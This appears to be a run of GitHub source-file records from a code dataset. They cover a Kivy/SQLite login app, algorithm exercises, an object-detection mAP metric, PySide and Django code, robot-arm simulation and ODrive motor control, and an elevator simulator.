scr.add_widget(MenuScreen(name='menu'))\r\n scr.add_widget(ProfileScreen(name='profile'))\r\n scr.add_widget(UploadScreen(name='upload'))\r\n scr.add_widget(LoginScreen(name='login'))\r\n scr.add_widget(SignupScreen(name='signup'))\r\n scr.add_widget(ClientsTable(name='Clientstable'))\r\n scr.add_widget(firstpage(name='new'))\r\n return scr\r\n\r\n def navigation_draw(self):\r\n pass\r\n\r\n def on_start(self):\r\n Clock.schedule_once(self.login, 3)\r\n\r\n def login(self, *args):\r\n scr.current = \"login\"\r\n\r\n def create(self, *args):\r\n add = self.root.get_screen('signup')\r\n email = add.ids[\"email\"].text\r\n password = add.ids[\"password\"].text\r\n if (email == ''):\r\n self.dialog = MDDialog(\r\n title=\"INVALID LOGIN\",\r\n text=\"Please enter corrent login id\",\r\n size_hint=(0.7, 1),\r\n radius=[20, 7, 20, 7],\r\n buttons=[\r\n MDFlatButton(\r\n text=\"OK\",\r\n theme_text_color=\"Error\",\r\n text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n ),\r\n MDFlatButton(\r\n text=\"CANCEL\",\r\n theme_text_color=\"Custom\",\r\n text_color=self.theme_cls.primary_color,\r\n )\r\n , ], )\r\n self.dialog.open()\r\n\r\n else:\r\n conn = sqlite3.connect('accounts.db')\r\n c = conn.cursor()\r\n c.execute(\"INSERT INTO accounts VALUES (?, ?)\", [email, password])\r\n\r\n self.dialog = MDDialog(\r\n title=\"SUCESSFULLY CREATED\",\r\n text=\"CLICK BACK TO LOGIN PAGE\",\r\n size_hint=(0.7, 1),\r\n radius=[20, 7, 20, 7],\r\n buttons=[\r\n MDFlatButton(\r\n text=\"OK\",\r\n theme_text_color=\"Error\",\r\n text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n ), ], )\r\n self.dialog.open()\r\n conn.commit()\r\n conn.close()\r\n\r\n def log(self, *args):\r\n new = self.root.get_screen('login')\r\n email = new.ids[\"email\"].text\r\n password = new.ids[\"password\"].text\r\n conn = sqlite3.connect('accounts.db')\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM accounts WHERE uname=? and pwd=?\", [email, password])\r\n if c.fetchone() == None:\r\n\r\n self.dialog = MDDialog(\r\n title=\"INVALID LOGIN\",\r\n text=\"Please enter correct id and password\",\r\n size_hint=(0.7, 1),\r\n radius=[20, 7, 20, 7],\r\n buttons=[\r\n MDFlatButton(\r\n text=\"OK\",\r\n theme_text_color=\"Error\",\r\n text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n )\r\n , ], )\r\n self.dialog.open()\r\n else:\r\n self.dialog = MDDialog(\r\n title=\"WELCOME\",\r\n text=email,\r\n size_hint=(0.7, 1),\r\n radius=[20, 7, 20, 7],\r\n buttons=[\r\n MDFlatButton(\r\n text=\"OK\",\r\n theme_text_color=\"Error\",\r\n text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n ), ], )\r\n self.dialog.open()\r\n scr.current = 'menu'\r\n conn.commit()\r\n conn.close()\r\n\r\n def closeDialog(self, inst):\r\n self.dialog.dismiss()\r\n\r\n def add_record(self):\r\n new = self.root.get_screen('Clientstable')\r\n matter = new.ids[\"matter_name\"].text\r\n file_name = new.ids[\"file_name\"].text\r\n description = new.ids[\"description\"].text\r\n location = new.ids[\"location\"].text\r\n conn = sqlite3.connect(\"records.db\")\r\n c = conn.cursor()\r\n c.execute(\r\n \"CREATE TABLE IF NOT EXISTS records (id INTEGER PRIMARY KEY, matter text, filename text, description text, location text)\")\r\n c.execute(\"INSERT INTO records VALUES (NULL, ?, ?, ?, ?)\", (matter, file_name, description, location))\r\n conn.commit()\r\n\r\n def update_record(self):\r\n new = self.root.get_screen('Clientstable')\r\n matter = new.ids[\"matter_name\"].text\r\n file_name = new.ids[\"file_name\"].text\r\n description = new.ids[\"description\"].text\r\n location = new.ids[\"location\"].text\r\n conn = sqlite3.connect(\"records.db\")\r\n c = conn.cursor()\r\n c.execute(\"INSERT INTO records VALUES (NULL, ?, ?, ?, ?)\", (matter, file_name, description, location))\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n MainApp().run()\r\n","repo_name":"santhoshkumarlabs/withkivysqlite3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73093576362","text":"# Uses python3\nimport sys\n\ndef fibonacci_sum_naive(n):\n if n <= 1:\n return n\n\n previous = 0\n current = 1\n sum = 1\n\n for _ in range(n - 1):\n previous, current = current, previous + current\n sum += current\n\n return sum % 10\n\n\ndef get_fibonacci_huge(n,m):\n previous = 0\n current = 1\n \n for i in range(m*m):\n previous, current = current, (current+previous)%m\n if (previous, current) == (0,1):\n period = i + 1\n break\n\n j = n%period\n\n if j == 0:\n return j\n else:\n previous = 0\n current = 1\n for i in range (2, j+1):\n previous, current = current, (current+previous)%m\n return current\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n # print(fibonacci_sum_naive(n))\n print((get_fibonacci_huge(n+2,10)-1)%10)\n","repo_name":"etherion-1337/Data_Structure_Algo_UCSD","sub_path":"Course_1_Algorithmic_Toolbox/week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers/fibonacci_sum_last_digit.py","file_name":"fibonacci_sum_last_digit.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4964529855","text":"import torch\nfrom tools.utils import intersection_over_union\n\n\ndef mean_average_precision(pred_boxes, true_boxes, classes, iou_threshold=0.5) -> float:\n \"\"\"\n Mean Average Precision of bounding boxes.\n\n param: pred_boxes - predicted bounding boxes\n param: true_boxes - true bounding boxes\n param: classes - number of classes\n param: iou_threshold - threshold of IOU (default = 0.5)\n\n return: calculated mAP\n \"\"\"\n\n average_precisions = []\n\n for current_class in range(classes):\n FP = 0\n FN = 0\n TP = 0\n precisions = []\n recalls = []\n\n for i in range(len(true_boxes)):\n FN += len([box for box in true_boxes[i] if box[5] == current_class])\n\n for i in range(len(pred_boxes)):\n pred_boxes_class = [box for box in pred_boxes[i] if torch.argmax(box[5:]) == current_class]\n true_boxes_class = [box for box in true_boxes[i] if box[5] == current_class]\n for k in range(len(pred_boxes_class)):\n max_iou = 0\n max_index = 0\n for j in range(len(true_boxes_class)):\n if intersection_over_union(pred_boxes_class[k], true_boxes_class[j]).item() > max_iou:\n max_iou = intersection_over_union(pred_boxes_class[k], true_boxes_class[j]).item()\n max_index = j\n\n if max_iou < iou_threshold:\n FP += 1\n else:\n TP += 1\n FN -= 1\n true_boxes_class.pop(max_index)\n\n precisions.append(TP / (TP + FP))\n recalls.append(TP / (TP + FN))\n\n precisions = torch.tensor(precisions)\n recalls = torch.tensor(recalls)\n average_precisions.append(torch.trapezoid(precisions, recalls))\n\n return sum(average_precisions) / len(average_precisions)\n","repo_name":"AlexeyDate/YOLOv2","sub_path":"tools/mAP.py","file_name":"mAP.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"21087109338","text":"from PySide6 import QtWidgets as qtw\nfrom PySide6 import QtCore as qtc\nfrom PySide6 import QtGui as qtg\nimport sys\n\n\nclass Caja(qtw.QLabel):\n def __init__(self, color):\n super(Caja, self).__init__()\n self.setStyleSheet(f\"background-color: {color}\")\n\n\nclass MainWindow(qtw.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n layout = qtw.QHBoxLayout()\n layout.addWidget(Caja(\"green\"))\n layout.addWidget(Caja(\"blue\"))\n layout.addWidget(Caja(\"red\"))\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(0)\n\n widget = qtw.QWidget()\n widget.setLayout(layout)\n\n self.setCentralWidget(widget)\n\n\nif __name__ == \"__main__\":\n app = qtw.QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec())\n","repo_name":"ferreret/curso_qt_pyside","sub_path":"04 Formas de organización/4-2 Layouts básicos/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10130290282","text":"\"\"\"\nThis is the main test .py file for our RMC system. It has references to all other files to get each functionality for each subsystem.\n\n@created: 10-4-2020\n\"\"\"\nimport odrive\nimport time\nimport math\n\nfrom odrive.enums import *\nfrom pynput import keyboard\n\n#from locomotion import locomotion_funcs\n#from digging import digging_funcs\n#from dumping import dumping_funcs\n#from lidar import lidar_funcs\n\ndef key_press(key):\n \"\"\"\n This function reads a key press in order to perform an action.\n \n Args:\n key (int): reads in the value of the key pressed from the listener\n \n Returns:\n Returning False will end the listener and all keyboard inputs, otherwise it will continue\n \"\"\"\n if key == keyboard.Key.esc:\n return False\n \n try:\n k = key.char # meant for single character keys - w, a, s, d etc.\n except:\n k = key.name # meant for other keys - arrow keys, space bar, return etc.\n \n # elif statements looking for the key pressed to perform the action within. Multiple keys can be programmed to the same action\n # in the array of characters\n if k in ['w']:\n odrv0.axis0.controller.input_vel = -50\n odrv0.axis1.controller.input_vel = 50\n \n elif k in ['a']:\n odrv0.axis0.controller.input_vel = 50\n odrv0.axis1.controller.input_vel = 50\n \n elif k in ['s']:\n odrv0.axis0.controller.input_vel = 50\n odrv0.axis1.controller.input_vel = -50\n \n elif k in ['d']:\n odrv0.axis0.controller.input_vel = -50\n odrv0.axis1.controller.input_vel = -50\n \n elif k in ['space']:\n odrv0.axis0.controller.input_vel = 0\n odrv0.axis1.controller.input_vel = 0\n\ndef main():\n print(\"Finding odrive(s) this may take a few seconds...\")\n try:\n odrv0 = odrive.find_any(serial_number=\"206430804648\")\n #odrv1 = odrive.find_any(serial_number=\"20863880304E\")\n except:\n print(\"finding odrive failed.\")\n \n print(\"It is time to control the robot!\\nThe controls are simple: wasd to move the robot directionally.\")\n print(\"Space will stop the robot in its tracks, and escape will end the control period altogether.\")\n listener = keyboard.Listener(on_press=key_press)\n listener.start()\n listener.join()\n print(\"Ending program.\")\n \n \nif __name__ == '__main__':\n main()","repo_name":"JMur2/MarquetteRMC2021","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71774504044","text":"from decimal import Decimal\n\nfrom django.db import models\nfrom django.db.models import Q, F, Sum\nfrom django.contrib.auth import get_user_model\nfrom django.core.validators import MinValueValidator\n\nfrom groups.models import Group\n\nUser = get_user_model()\n\n\nclass ExpenseManager(models.Manager):\n def create_expense(self, data, creator):\n expense = self.create(\n description=data[\"description\"],\n creator=creator,\n group=Group.objects.get(pk=data[\"group_pk\"]),\n total_cost=Decimal(data[\"total_cost\"]).quantize(Decimal(\".00\")),\n )\n for participant in data[\"participants\"]:\n user = User.objects.get(email=participant[0])\n expense.participants.add(\n user,\n through_defaults={\n \"share\": Decimal(participant[1]).quantize(Decimal(\".00\")),\n \"paid\": Decimal(participant[2]).quantize(Decimal(\".00\")),\n },\n )\n return expense\n\n\n# Create your models here.\nclass Expense(models.Model):\n description = models.TextField()\n participants = models.ManyToManyField(\n User, through=\"Share\", related_name=\"participants\", related_query_name=\"participants\"\n )\n creator = models.ForeignKey(User, null=True, on_delete=models.SET_NULL)\n group = models.ForeignKey(Group, null=True, on_delete=models.SET_NULL)\n created = models.DateTimeField(auto_now_add=True)\n total_cost = models.DecimalField(\n default=0.00, max_digits=12, decimal_places=2, validators=[MinValueValidator(0.00)]\n )\n\n objects = ExpenseManager()\n\n def get_debtors(self):\n return Share.objects.filter(expense=self, paid__lt=F(\"share\")).order_by(\"user\").values(\"user\", \"share\", \"paid\")\n\n def get_creditors(self):\n return Share.objects.filter(expense=self, paid__gt=F(\"share\")).order_by(\"user\").values(\"user\", \"share\", \"paid\")\n\n def get_totoal_transfer_amount(self):\n debtors = self.get_debtors()\n return sum([debtor[\"share\"] - debtor[\"paid\"] for debtor in debtors])\n\n def __str__(self):\n return self.description\n\n\nclass ShareManger(models.Manager):\n def get_spent(self, user):\n return self.filter(user=user).aggregate(Sum(\"share\"))[\"share__sum\"] or 0\n\n def get_group_most_share(self, user):\n expense_per_group = self.filter(user=user).values(\"expense__group\").annotate(Sum(\"share\"))\n expense_per_group = [\n (str(Group.objects.get(pk=_[\"expense__group\"])), float(_[\"share__sum\"])) for _ in expense_per_group\n ][:4]\n sum_expense_per_group = sum([_[1] for _ in expense_per_group])\n expense_per_group.append((\"other\", float(self.get_spent(user)) - sum_expense_per_group))\n return expense_per_group\n\n\nclass Share(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n expense = models.ForeignKey(Expense, on_delete=models.CASCADE)\n share = models.DecimalField(default=0.00, max_digits=12, decimal_places=2, validators=[MinValueValidator(0.00)])\n paid = models.DecimalField(default=0.00, max_digits=12, decimal_places=2, validators=[MinValueValidator(0.00)])\n\n objects = ShareManger()\n\n class Meta:\n unique_together = [[\"user\", \"expense\"]]\n","repo_name":"farhad-rezazadeh/bdong","sub_path":"expenses/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27801917101","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 15 23:03:34 2017\n\n@author: root\n\"\"\"\n\ncube = 56665\nepi = 0.01\nng = 0\nlow = 0.0\nhigh = cube\nguess = (high + low)/2.0\n\nwhile abs(guess**3 - cube) >= epi:\n if guess**3 < cube:\n low = guess\n else:\n high = guess\n guess = (high + low)/2.0\n ng += 1\nprint(\" Num Guesses: \" + str(ng))\nprint(str(guess) + \" is close to cuberoot of \" + str(cube))","repo_name":"goforaditya/MIT-Python-Programming","sub_path":"5. loops guess approx bisec/cuberootbisection.py","file_name":"cuberootbisection.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37780953607","text":"\"\"\"\nImplements a gym environment for the robot arm. \nThe environment is used for simulation and imitation learning.\n\"\"\"\nimport sys\nimport os\nproject_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(project_root)\n\nimport numpy as np\nfrom typing import Tuple\nimport gym\nfrom gym import spaces\nfrom model.iiwa14_model import Symbolic_model\nfrom simulation.simulation import Simulator, SimulatorOptions\n\nclass iiwa14EnvOptions:\n \n def __init__(self,dt:float,x_start: np.ndarray,x_end: np.ndarray,\n sim_time: float,sim_noise_R: np.ndarray,contr_input_state: str) -> None:\n \n if dt is None:\n self.dt = 0.01\n else:\n self.dt = dt \n # x_start is used to set the initial state of the robot, if None a random state is sampled in reset()\n if x_start is None:\n self.x_start = None\n else:\n self.x_start = x_start\n \n if x_end is None:\n self.x_end: np.ndarray = np.array([1.8,0.5,-0.2,-0.55,1.25,-1.2,0.25,0,0,0,0,0,0,0]).reshape(14,1)\n else:\n self.x_end = x_end\n \n if sim_time is None:\n self.sim_time = 2 \n else:\n self.sim_time = sim_time\n \n if sim_noise_R is None:\n self.sim_noise_R = None\n else:\n self.sim_noise_R = sim_noise_R\n \n if contr_input_state is None:\n self.contr_input_state = 'real'\n else:\n self.contr_input_state = contr_input_state\n \n self.render_mode = None\n self.maximum_torques: np.ndarray = np.array([50,100,10,50,5,5,1])\n self.goal_dist_euclid: float = 0.01\n self.goal_min_time: float = 1 \n\n\nclass iiwa14Env(gym.Env):\n \n def __init__(self,options: iiwa14EnvOptions) -> None:\n self.options = options\n self.sim_model = Symbolic_model()\n self.dt = self.options.dt\n self._state = self.options.x_start\n self.x_final= self.options.x_end\n self.pee_final = self.sim_model.forward_kinemetics(self.x_final[0:7])\n self.max_intg_steps = int(self.options.sim_time/self.options.dt)\n self.no_intg_steps = 0\n \n # define simulator\n sim_opts = SimulatorOptions(\n dt = self.dt,\n n_iter = self.max_intg_steps,\n R = self.options.sim_noise_R,\n contr_input_state = self.options.contr_input_state\n )\n self.simulator = Simulator(self.sim_model, controller=None, integrator='cvodes', opts = sim_opts)\n \n # define action and observation space\n nx_ = self.sim_model.nx\n self.observation_space = spaces.Box(np.array([-np.pi * 200] * nx_),np.array([np.pi * 200] * nx_),dtype=np.float64)\n self.action_space = spaces.Box(-options.maximum_torques, options.maximum_torques,dtype=np.float64)\n \n self.render_mode = self.options.render_mode\n self.goal_dist_counter = 0\n self.stop_if_goal_reached = True\n \n def reset(self):\n if self._state is None:\n self._state = self.sample_rand_config()\n \n self.simulator.reset(x0=self._state)\n self.no_intg_steps = 0\n \n return self._state\n \n def step(self,a) -> Tuple[np.ndarray, float, bool, dict]:\n \n self._state = self.simulator.step(a)\n \n self.no_intg_steps += 1\n \n # define reward as Euclidian distance to goal\n pee_current = self.sim_model.pee(self._state[:int(self.sim_model.nq)]) \n dist = np.linalg.norm(pee_current - self.pee_final,2) \n reward = -dist * self.options.dt\n \n # check if goal is reached\n done = bool(self.terminal(dist))\n \n observation = self._state[:,0]\n \n info = {}\n return(observation, reward, done, info)\n \n def step_mix_with_policy(self,a,mixture_ratio,agent)-> Tuple[np.ndarray, float, bool, dict]:\n obs = self._state[:,-1].reshape(1,14)\n print(obs)\n predictions = agent.get_action(obs)\n predictions = predictions\n \n self._state = self.simulator.mix_step(a,predictions.reshape(1,7),mixture_ratio)\n print(self._state)\n self.no_intg_steps += 1\n \n # define reward as Euclidian distance to goal\n pee_current = self.sim_model.pee(self._state[:int(self.sim_model.nq)]) \n dist = np.linalg.norm(pee_current - self.pee_final,2) \n reward = -dist * self.options.dt\n \n # check if goal is reached\n done = bool(self.terminal(dist))\n \n observation = self._state[:,0]\n print(observation)\n \n info = {}\n return(observation, reward, done, info)\n \n \n \n def terminal(self,dist:float):\n if dist < self.options.goal_dist_euclid:\n self.goal_dist_counter += 1\n else:\n self.goal_dist_counter = 0\n \n done = False\n \n if (self.goal_dist_counter >= self.options.goal_min_time/self.options.dt) and self.stop_if_goal_reached:\n done = True\n if self.no_intg_steps >= self.max_intg_steps:\n done = True\n return bool(done)\n \n def sample_rand_config(self): \n q = []\n q_range = np.deg2rad([170,120,170,120,170,120,175])\n alpha = 0.3\n np.random.seed(3)\n for limit in q_range:\n single_joint = np.random.uniform(alpha * limit, -alpha * limit)\n q.append(single_joint)\n q = np.array(q).reshape(7,1)\n dq = np.zeros((7,1))\n x = np.vstack((q,dq))\n print(\"initial_state:\",x)\n return x \n \nif __name__ == \"__main__\":\n env_options = iiwa14EnvOptions(dt=0.01,x_start=None,x_end=None,\n sim_time=3,sim_noise_R=None,contr_input_state=None)\n env = iiwa14Env(env_options)\n x_start = env.reset()\n print(x_start)\n next_observation,reward,done,_ = env.step(np.array([25,25,25,25,25,25,25]))\n print(next_observation)\n print(reward)\n print(done)","repo_name":"wenxin0917/Imitation-Learning-of-MPC-for-LBR-iiwa-14","sub_path":"environment/gym_env.py","file_name":"gym_env.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35905862040","text":"from sw_app.db import db\nfrom sw_app.catalog.models import Product\n\ndef add_data():\n test_data = [{'cat': 'Категория1', 'title': 'Название1', 'number': '45', 'articul': '123456', 'price': '4589',\n 'description': 'Описание1'},\n {'cat': 'Категория2', 'title': 'Название2', 'number': '56', 'articul': '456987', 'price': '1025',\n 'description': 'Описание2'},\n {'cat': 'Категория3', 'title': 'Название3', 'number': '99', 'articul': '754123', 'price': '7865',\n 'description': 'Описание3'}, ]\n for data in test_data:\n cat = data['cat']\n title = data['title']\n number = data['number']\n articul = data['articul']\n price = data['price']\n description = data['description']\n\n data_test(cat, title, number, articul, price, description)\n\n\ndef data_test(cat, title, number, articul, price, description):\n new_product = Product(cat=cat, title=title, number=number, articul=articul, price=price, description=description)\n db.session.add(new_product)\n db.session.commit()","repo_name":"MuRash33/shop_web","sub_path":"test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45046490188","text":"__author__ = 'Ciaran'\n\"\"\"\nObject orientated programming\nAaignment 2\nDate:3/04/2015\nThe aim of this assignment was to create a lift simulator using 3 classes, Building, person, and elevator.\nMy program is relatively simple with all the necessary code contained within main()\nThe elevator starts off at a random floor with the user entering the number of floors and the number of people in the building\nwanting to use the elevator.\nThe program outputs the location of the people in the building and where they want to go before the elevator starts moving, after this the elevator is shown to be moving towards\nthe first customer.\nIt goes through all customers and when all customers are where they want to be the simulation ends\n\n\n\n\"\"\"\nimport random\nimport time\n\nclass Building(object):\n \"\"\"Docstring for the class Building\n This class is fairly simple it holds the variable for the building ie how many people are in the building, how many floors\n are in the building etc\"\"\"\n def __init__(self,no_elevators,no_floors,no_people ):\n self.no_elevators=no_elevators\n self.no_floors=no_floors\n self.no_people=no_people\n\n\n\n\nclass Elevator(object):\n \"\"\"Again this is fairly simple this class is the elevator class and it holds the data for what floor the elevator is on and how many people are in the\n elevator\n \"\"\"\n current_floor=1\n def __init__(self,no_people_elevator=0,current_floor=1,next_floor=0 ):\n self.no_people_elevator=no_people_elevator\n self.current_floor=current_floor\n self.next_floor=next_floor\n\n\nclass Person(object):\n \"\"\"This is the class for people, it holds the id number for the instance of the class as well as generating a random floor for the person\n to be on as well as generating a random floor for them to want to go to, it also holds the flag for whether the person is waiting for the elevator\n whether the in the elevator or whether they have been delivered\n \"\"\"\n def __init__(self,id,current_floor=0,wanted_floor=0,in_elevator=0):\n self.id=id\n self.current_floor=random.randint(1,Building.no_floors)#code to generate a random floor for the person to be on\n self.wanted_floor=random.randint(1,Building.no_floors)#code to generate a random floor fo them to want to go to\n self.in_elevator=in_elevator#flag\n\n\ndef main():#main program\n cus_list=[]\n current_floor=[]\n wanted_floor=[]\n in_elevator=[]\n check1=0\n\n while(check1==0):#Loop to validate user input, if the user enters in an invalid character they get a message telling them so\n try:\n Building.no_people=int(input(\"How many Customers will there be?\"))\n Building.no_floors=int(input(\"How many Floors will there be?\"))\n check1=1\n except ValueError:\n print(\"Invalid input, please input a number\")\n\n\n Elevator.current_floor=random.randint(1,Building.no_floors)#random floor for the elevator to start on\n\n j=-1\n for i in range (1,int(Building.no_people)+1):#creates multiple instances of a person\n cus_list.append(Person(i))\n\n for i in range (1,int(Building.no_people)+1):#Places random values into variables for the instances of the person\n current_floor.append(Person(i).current_floor)\n wanted_floor.append(Person(i).wanted_floor)\n in_elevator.append(Person(i).in_elevator)\n\n check=0\n for i in range (1,int(Building.no_people)+1):#This is the main part of the program\n in_elevator[j]=0\n j+=1\n k=-1\n if check==0:\n for i in range (1,int(Building.no_people)+1):#prints the location of each person in the building and where they want to go\n k+=1\n print(\"Current position of customer\",current_floor[k])\n print(\"Current position of wanted floor\",wanted_floor[k])\n check=1\n\n print(\"Elevator Current Position\",Elevator.current_floor)\n while in_elevator[j]!=2:#loop for the elevator will end when everyone has got to their desired floors\n k=-1\n for i in range (1,int(Building.no_people)+1):#go through every person and see if anyone is at the floor and whants to get on\n k+=1\n if Elevator.current_floor==current_floor[k] and in_elevator[k]!=1 and in_elevator[k]!=2:#checks to see if the person here has already gotten on or has\n # already been delivered\n in_elevator[k]=1#sets their flag\n print(\"Person Collected\")\n #checks through all the people to see if any of them have to get of at the current floor\n if Elevator.current_floor==wanted_floor[k] and in_elevator[k]==1:\n in_elevator[k]=2\n print(\"Person Dropped off\")\n\n if Elevator.current_floorcurrent_floor[j] and in_elevator[j]!=1 and in_elevator[j]!=2:#checks to see if there below them\n k=-1\n Elevator.current_floor-=1\n time.sleep(.5)\n print(\"Elevator Current Position\",Elevator.current_floor)\n\n\n\n if Elevator.current_floor==wanted_floor[j] and in_elevator[j]==1:#If someone has been collected ie their flag has been set to 1\n #they are registered as being collected and if they are at the floor they want to go to they are registered as being delivered\n in_elevator[j]=2\n print(\"Person Dropped off\")\n k=-1\n\n\n\n elif Elevator.current_floorwanted_floor[j] and in_elevator[j]==1:#checks to see if the elevator has to go down to deliver someone\n Elevator.current_floor-=1\n time.sleep(.5)\n print(\"Elevator Current Position\",Elevator.current_floor)\n k=-1\n for i in range (1,int(Building.no_people)+1):\n k+=1\n if Elevator.current_floor==wanted_floor[k] and in_elevator[k]==1:\n in_elevator[k]=2\n print(\"Person Dropped off\")\n\n\n\n\nmain()#starts the program","repo_name":"ErikGrunner/College-Year-2","sub_path":"Programming Semester 2/Assignment/Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"46070817903","text":"# vim: set fileencoding=utf-8 :\nimport models\nfrom django.contrib import admin\n\n\nclass AdSkuAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'purchase_template',\n 'manage_template',\n 'ad_space',\n 'priority',\n 'price_per_click',\n 'price_per_impression',\n 'click_discounts',\n 'impression_discounts',\n 'karma',\n )\n\n\nclass ArticleAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'link_title',\n 'link_url',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'storage_id',\n )\n\n\nclass CalendarAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'default_date',\n 'default_view',\n 'visitor_cache_timeout',\n 'template_id_month',\n 'template_id_week',\n 'template_id_day',\n 'template_id_event',\n 'template_id_event_edit',\n 'template_id_search',\n 'template_id_print_month',\n 'template_id_print_week',\n 'template_id_print_day',\n 'template_id_print_event',\n 'group_id_event_edit',\n 'group_id_subscribed',\n 'subscriber_notify_offset',\n 'sort_events_by',\n 'list_view_page_interval',\n 'template_id_list',\n 'template_id_print_list',\n 'ical_interval',\n 'workflow_id_commit',\n 'ical_feeds',\n )\n\n\nclass CarouselAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'items',\n 'template_id',\n 'slide_width',\n )\n\n\nclass DataFormAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'acknowledgement',\n 'mail_data',\n 'email_template_id',\n 'acknowlegement_template_id',\n 'list_template_id',\n 'asset_id',\n 'template_id',\n 'default_view',\n 'revision_date',\n 'group_to_view_entries',\n 'mail_attachments',\n 'use_captcha',\n 'store_data',\n 'field_configuration',\n 'tab_configuration',\n 'workflow_id_add_entry',\n 'html_area_rich_editor',\n )\n\n\nclass DataFormEntryAdmin(admin.ModelAdmin):\n\n list_display = (\n 'data_form_entry_id',\n 'user',\n 'username',\n 'ip_address',\n 'asset_id',\n 'entry_data',\n 'submission_date',\n )\n list_filter = ('user', 'submission_date')\n\n\nclass DataTableAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'data',\n 'template_id',\n )\n\n\nclass EMSBadgeAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'price',\n 'seats_available',\n 'related_badge_groups',\n 'template_id',\n 'early_bird_price',\n 'early_bird_price_end_date',\n 'pre_registration_price',\n 'pre_registration_price_end_date',\n )\n\n\nclass EMSBadgeGroupAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'badge_group', 'ems_asset_id', 'name')\n list_filter = ('badge_group',)\n search_fields = ('name',)\n\n\nclass EMSEventMetaFieldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'field_id',\n 'asset_id',\n 'label',\n 'data_type',\n 'visible',\n 'required',\n 'possible_values',\n 'default_values',\n 'sequence_number',\n )\n\n\nclass EMSRegistrantAdmin(admin.ModelAdmin):\n\n list_display = (\n 'badge_id',\n 'user',\n 'badge_number',\n 'badge_asset_id',\n 'ems_asset_id',\n 'name',\n 'address1',\n 'address2',\n 'address3',\n 'city',\n 'state',\n 'zipcode',\n 'country',\n 'phone_number',\n 'organization',\n 'email',\n 'notes',\n 'purchase_complete',\n 'has_checked_in',\n 'transaction_item_id',\n )\n list_filter = ('user',)\n search_fields = ('name',)\n\n\nclass EMSRegistrantRibbonAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'badge_id',\n 'ribbon_asset_id',\n 'transaction_item_id',\n )\n\n\nclass EMSRegistrantTicketAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'badge_id',\n 'ticket_asset_id',\n 'purchase_complete',\n 'transaction_item_id',\n )\n\n\nclass EMSRegistrantTokenAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'badge_id',\n 'token_asset_id',\n 'quantity',\n 'transaction_item_ids',\n )\n\n\nclass EMSRibbonAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'percentage_discount',\n 'price',\n )\n\n\nclass EMSTicketAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'price',\n 'seats_available',\n 'start_date',\n 'duration',\n 'event_number',\n 'location',\n 'related_badge_groups',\n 'related_ribbons',\n 'event_meta_data',\n )\n list_filter = ('start_date',)\n\n\nclass EMSTokenAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'revision_date', 'price')\n\n\nclass EventAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'feed_id',\n 'feed_uid',\n 'start_date',\n 'end_date',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 